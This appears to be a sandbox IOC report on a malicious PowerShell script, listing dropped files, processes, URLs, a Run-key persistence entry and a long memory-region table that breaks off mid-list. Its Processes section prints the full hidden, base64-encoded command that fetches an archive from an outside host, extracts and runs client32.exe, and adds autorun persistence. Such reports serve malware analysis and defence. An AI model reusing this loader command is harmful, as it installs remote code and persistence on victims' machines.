IOC Report
loc.ps1

loading gif

Files

File Path
Type
Category
Malicious
loc.ps1
Unicode text, UTF-8 (with BOM) text, with very long lines (4805), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sbjehas.qns.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ibkftyv.amz.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_em3oh2mh.n0i.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozkg1ozz.s3s.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3P1HFSB2X1BEQTFWIRPH.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\loc.ps1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBjAGUAOwAgACQAewBGAG8AYABsAEQAfQAuACIAYQB0AFQAYABSAEkAYgB1AGAAVABgAGUAcwAiAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAnAEgAaQBkAGQAZQAnACkAOwAgAC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAFIAZQBtAG8AJwAsACcAdgAnACwAJwBlAC0ASQB0AGUAbQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAcABhAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgACYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcgB0ACcALAAnAHMAdABhACcAKQAgACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcAdAAzACcALAAnAHgAZQAnACwAJwAyAC4AZQAnACwAJwBjAGwAaQBlAG4AJwApADsAIAAkAHsAZgBTAGAAVABSAH0APQAkAHsAcABgAFoAaQBQAH0AKwAoACgAKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcAMwAyAC4AZQB4AGUAJwAsACcAaQBlAG4AdAAnACwAJwBOAGMAbAAnACwAJwBUADcAJwApACkAIAAgAC0AQwBSAGUAUABMAEEAYwBlACAAKABbAGMAaABBAHIAXQA4ADQAKwBbAGMAaABBAHIAXQA1ADUAKwBbAGMAaABBAHIAXQA3ADgAKQAsAFsAYwBoAEEAcgBdADkAMgApADsAIAAkAHsAcgBgAE4AbQB9AD0AKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9ACIAIAAtAGYAIAAnAE4ARQBOACcALAAnAEUAdQBwAGQAYQB0AGUAJwAsACcAMABUACcALAAnAE8AJwAsACcAXwAnACkAKwAkAHsAcgBgAFIATgBgAFUAbQB9ADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADQAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQBtACcALAAnAFAAcgBvACcALAAnAHIAdAB5ACcALAAnAGUAJwAsACcAcAAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQB9AHsAOQB9AHsAOAB9AHsANgB9AHsAMwB9AHsAMQAwAH0AewAwAH0AewA3AH0AewA0AH0AewAyAH0AewA1AH0AIgAtAGYAIAAnAHoAVwAnACwAJwBIACcALAAnAG4AUABjACcALAAnAEYAVABXAEEAUgBFAFAAYwB6AE0AaQBjAHIAbwBzACcALAAnAHIAcgBlAG4AdABWAGUAcgBzAGkAbwAnACwAJwB6AFIAdQBuACcALAAnAFMATwAnACwAJwBpAG4AZABvAHcAcwBQAGMAegBDAHUAJwAsACcAUABjAHoAJwAsACcASwBDAFUAOgAnACwAJwBvAGYAdABQAGMAJwApACkALgAiAHIARQBwAEwAYABBAGMARQAiACgAKABbAEMAaABBAFIAXQA4ADAAKwBbAEMAaABBAFIAXQA5ADkAKwBbAEMAaABBAFIAXQAxADIAMgApACwAWwBzAFQAUgBJAG4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAIAAtAE4AYQBtAGUAIAAkAHsAUgBgAE4AbQB9ACAALQBWAGEAbAB1AGUAIAAkAHsAZgBTAGAAVABSAH0AIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBnACcALAAnAG4AJwAsACcAUwB0AHIAaQAnACkAOwA=
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://usherskenya.co.ke/forms/view.php8F
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 3 hidden URLs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ONEN0TEupdate_1220

Memdumps

Base Address
Regiontype
Protect
Malicious
229C4930000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
7FF9A576D000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4550000
heap
page read and write
229C4380000
trusted library allocation
page read and write
281BA107000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229A9FE0000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229ACBF6000
trusted library allocation
page read and write
229C45C6000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C43BB000
heap
page read and write
229C45C1000
trusted library allocation
page read and write
86A983E000
stack
page read and write
229C45B9000
trusted library allocation
page read and write
229C448A000
heap
page read and write
229C4399000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45C6000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229AA360000
trusted library allocation
page read and write
229C442B000
heap
page read and write
229C45A4000
trusted library allocation
page read and write
229C434C000
trusted library allocation
page read and write
229AD039000
trusted library allocation
page read and write
229C4370000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229AA1AA000
heap
page read and write
D3B68F5000
stack
page read and write
229C493F000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C445C000
heap
page read and write
281D1CBA000
heap
page read and write
229C4589000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4929000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4A00000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45B3000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B2000
trusted library allocation
page read and write
281D1C70000
heap
page read and write
229C4399000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
7FF9A5A60000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229AD006000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4A50000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
D3B6F3E000
stack
page read and write
281D1CFB000
heap
page read and write
229C4960000
trusted library allocation
page read and write
281B9670000
heap
page read and write
229AD753000
trusted library allocation
page read and write
229C4349000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C45B5000
trusted library allocation
page read and write
229C45D2000
trusted library allocation
page read and write
229C45BA000
trusted library allocation
page read and write
229AD0C9000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
7FF9A5960000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4A70000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229AA1A6000
heap
page read and write
7FF9A5830000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45B3000
trusted library allocation
page read and write
229C43E1000
heap
page read and write
7FF9A5AD0000
trusted library allocation
page execute and read and write
7FF9A5690000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C49B0000
trusted library allocation
page read and write
281D1E17000
heap
page execute and read and write
229C45C0000
trusted library allocation
page read and write
229ACC23000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
229C4532000
heap
page read and write
229C4399000
trusted library allocation
page read and write
229C45DC000
trusted library allocation
page read and write
229C4398000
trusted library allocation
page read and write
229C44DB000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229ABCFF000
heap
page read and write
229C4320000
heap
page execute and read and write
229C4391000
trusted library allocation
page read and write
229ACC1B000
trusted library allocation
page read and write
229BC3F7000
trusted library allocation
page read and write
86A95FE000
stack
page read and write
229C45C8000
trusted library allocation
page read and write
229C44B1000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
281B9D1C000
trusted library allocation
page read and write
229C45C2000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229AA320000
trusted library allocation
page read and write
229C4585000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C45DA000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4924000
trusted library allocation
page read and write
229C43DD000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
281BA084000
trusted library allocation
page read and write
229C43CB000
heap
page read and write
229C4930000
trusted library allocation
page read and write
281D1C30000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C45CE000
trusted library allocation
page read and write
7FF9A5A70000
trusted library allocation
page read and write
7FF9A5860000
trusted library allocation
page read and write
229C45B4000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C45C4000
trusted library allocation
page read and write
229ACF2A000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229ABC8E000
heap
page read and write
D3B733C000
stack
page read and write
7FF9A55BD000
trusted library allocation
page execute and read and write
229C45C0000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
229ABD17000
heap
page read and write
229C4320000
trusted library allocation
page read and write
281D1C4B000
heap
page read and write
D3B7039000
stack
page read and write
229C4341000
trusted library allocation
page read and write
281BA075000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C458F000
heap
page read and write
229C4390000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C9000
trusted library allocation
page read and write
229AD88D000
trusted library allocation
page read and write
7FF9A5847000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C444D000
heap
page read and write
229ACBDD000
trusted library allocation
page read and write
229C4922000
trusted library allocation
page read and write
281B9630000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4A10000
trusted library allocation
page read and write
229C45BA000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C45CA000
trusted library allocation
page read and write
7FF9A5696000
trusted library allocation
page read and write
7FF9A59B0000
trusted library allocation
page read and write
229AD6CB000
trusted library allocation
page read and write
229C4A00000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4925000
trusted library allocation
page read and write
229C446F000
heap
page read and write
229C4394000
trusted library allocation
page read and write
229C4A40000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4343000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229AD636000
trusted library allocation
page read and write
229C4320000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229AA19D000
heap
page read and write
229ACDBB000
trusted library allocation
page read and write
281D1E50000
heap
page read and write
281D1C51000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C4A50000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C7000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C4931000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229ACFAA000
trusted library allocation
page read and write
229AD077000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4496000
heap
page read and write
229C45B1000
trusted library allocation
page read and write
229C43F4000
heap
page read and write
229BC4AB000
trusted library allocation
page read and write
229C448F000
heap
page read and write
229C45CA000
trusted library allocation
page read and write
7FF9A5B04000
trusted library allocation
page read and write
229AD4FD000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
281D1C3F000
heap
page read and write
281BA0A4000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
7FF9A5A34000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45C5000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C43C5000
heap
page read and write
229ABC9E000
heap
page read and write
229C43D8000
heap
page read and write
229C44DF000
heap
page read and write
229ACDCC000
trusted library allocation
page read and write
281B7C58000
heap
page read and write
7FF9A5A90000
trusted library allocation
page execute and read and write
229C4394000
trusted library allocation
page read and write
229C45C3000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229ACF86000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
86A9B3C000
stack
page read and write
D3B6CFA000
stack
page read and write
229C4397000
trusted library allocation
page read and write
229C4330000
trusted library allocation
page read and write
229C45C3000
trusted library allocation
page read and write
281BA127000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C49E0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
D3B71FE000
stack
page read and write
D3B6C7E000
stack
page read and write
229C493A000
trusted library allocation
page read and write
229C4562000
heap
page read and write
229C45C4000
trusted library allocation
page read and write
281B9C53000
trusted library allocation
page read and write
281B7C96000
heap
page read and write
229C43FC000
heap
page read and write
7FF9A58F0000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
7FF9A5782000
trusted library allocation
page read and write
229ACB13000
trusted library allocation
page read and write
7FF9A56C6000
trusted library allocation
page execute and read and write
229C4347000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4398000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
7FF9A58A0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C1000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45CB000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4921000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229AD022000
trusted library allocation
page read and write
229C49A0000
heap
page read and write
229C4920000
trusted library allocation
page read and write
7FF9A57C0000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C2000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229AD6E1000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
86A97BE000
stack
page read and write
229C45D0000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
7FF9A59C8000
trusted library allocation
page read and write
229ABD0C000
heap
page read and write
229C45C3000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C4546000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
281BA139000
trusted library allocation
page read and write
229AD011000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C43BB000
heap
page read and write
7FF9A5B07000
trusted library allocation
page read and write
229AD6F9000
trusted library allocation
page read and write
229C4360000
trusted library allocation
page read and write
229C49B0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4385000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4980000
trusted library allocation
page read and write
229C4565000
heap
page read and write
229C45A0000
trusted library allocation
page read and write
7FF9A5819000
trusted library allocation
page read and write
229C4574000
heap
page read and write
229C4970000
trusted library allocation
page read and write
229AC1B1000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229ACC44000
trusted library allocation
page read and write
7FF9A5791000
trusted library allocation
page read and write
229ABC15000
heap
page read and write
281D1C63000
heap
page read and write
229C4394000
trusted library allocation
page read and write
229AA120000
heap
page read and write
7FF9A560D000
trusted library allocation
page execute and read and write
229C43C7000
heap
page read and write
229C4390000
trusted library allocation
page read and write
229C4341000
trusted library allocation
page read and write
229ACE0B000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229ACF04000
trusted library allocation
page read and write
7FF9A57E9000
trusted library allocation
page read and write
229C4A44000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C43B9000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C4A10000
trusted library allocation
page read and write
229C45CA000
trusted library allocation
page read and write
229C4360000
trusted library allocation
page read and write
281C9C31000
trusted library allocation
page read and write
229ACF5B000
trusted library allocation
page read and write
229C44BD000
heap
page read and write
229C49A1000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
281D1D1C000
heap
page read and write
229C45B3000
trusted library allocation
page read and write
7FF9A5800000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229BC4A7000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C43DA000
heap
page read and write
229C4391000
trusted library allocation
page read and write
229C45C4000
trusted library allocation
page read and write
229C4435000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
281B7C90000
heap
page read and write
229C4391000
trusted library allocation
page read and write
229C4929000
trusted library allocation
page read and write
229C43B9000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
7FF9A5AE3000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229AA176000
heap
page read and write
229C44A8000
heap
page read and write
86A9ABE000
stack
page read and write
229ACE7A000
trusted library allocation
page read and write
229C441A000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
7FF9A58B0000
trusted library allocation
page read and write
281B7C67000
heap
page read and write
229C4413000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
7FF9A5890000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
281BA178000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
7FF9A569C000
trusted library allocation
page execute and read and write
281D1CFA000
heap
page read and write
229C45D2000
trusted library allocation
page read and write
229C4552000
heap
page read and write
229C43E7000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
7FF9A5940000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
281BA094000
trusted library allocation
page read and write
229AA140000
heap
page read and write
229AA226000
heap
page read and write
229C4370000
trusted library allocation
page read and write
7FF9A58C0000
trusted library allocation
page read and write
229C4DB0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
281D1C9B000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C4990000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
281D1D2E000
heap
page read and write
229C4397000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C4558000
heap
page read and write
229AD5F8000
trusted library allocation
page read and write
229ACCFE000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
86A917E000
stack
page read and write
7FF9A57E0000
trusted library allocation
page read and write
7FF9A5970000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4577000
heap
page read and write
229C4970000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229C45C7000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
281D1D06000
heap
page read and write
229C4920000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
86A957E000
stack
page read and write
229C45C9000
trusted library allocation
page read and write
229C43EC000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4559000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
7FF9A5792000
trusted library allocation
page read and write
229C45BE000
trusted library allocation
page read and write
229C448D000
heap
page read and write
229C439C000
trusted library allocation
page read and write
229C45C7000
trusted library allocation
page read and write
7FF9A55E4000
trusted library allocation
page read and write
229C45B5000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229ACF7C000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4A00000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
281BA194000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C4000
trusted library allocation
page read and write
229C49A1000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
281D2230000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229ACFEF000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
7FF9A5BC0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
7FF9A5830000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
7FF9A57F0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229ABBC0000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
7FF9A5900000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229C45B0000
